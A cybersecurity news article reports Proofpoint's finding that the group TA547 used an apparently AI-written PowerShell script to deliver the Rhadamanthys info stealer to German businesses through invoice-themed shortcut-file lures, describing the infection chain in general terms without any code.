Artificial Intelligence & Machine Learning , Cybercrime , Fraud Management & Cybercrime
Cybercrime Group Uses Likely AI Script to Load Info Stealer
Proofpoint Spots Novel Threat Against German OrganizationsA financially motivated threat group targeting German businesses used a script apparently coded by artificial intelligence to download an info stealer onto victim computers, said Proofpoint.
See Also: 2024 CISO Insights: Navigating the Cybersecurity Maelstrom
The U.S. cybersecurity company said Wednesday it spotted the cybercrime group it tracks as TA547 deploying a PowerShell script with some unusual characteristics. The script, used to load the Rhadamanthys info stealer, contains "grammatically correct and hyper specific comments above each component of the script," Proofpoint said.
It's a best practice for coders to add comments in code, but the comments' redundant and chatty style is "typical output of LLM-generated coding content," Proofpoint said.
Coders for years now have looked to artificial intelligence to automate tasks, and more than 9 in 10 programmers use AI, according to a 2023 survey of American programmers. But the practice isn't without its risks (see: Hackers Can Use AI Hallucinations to Spread Malware).
The widespread availability of large language models has nonetheless supercharged worries that bad actors will turn to LLMs to boost their prowess. In this case, Proofpoint says, the threat actor used the apparently AI-generated script to deliver a malware payload but not to alter or design the info stealer itself. "Regardless of whether it is human or machine-generated, the defense against such threats remains the same," Proofpoint said.
The bait used by TA547 to spread malware purportedly originated with German cash-and-carry retailer Metro and supposedly pertains to an invoice. Bait that appears more realistic is, of course, another oft-voiced fear about criminal use of LLMs, although whether the threat actor used artificial intelligence to clean up its German grammar is unknowable.
Proofpoint first spotted TA547 in November 2017 distributing a banking Trojan. The researchers said the group is an initial access broker.
Once a victim takes the bait by opening a compressed file containing a Windows shortcut file - and executing the file - a chain of PowerShell scripts ultimately ends with Rhadamanthys loaded into computer memory.
Previously, the threat actor used zipped JavaScript attachments to deliver malware but transitioned to compressed LNKs in early March. In addition to Germany, recent campaigns have targeted organizations in Spain, Switzerland, Austria and the United States.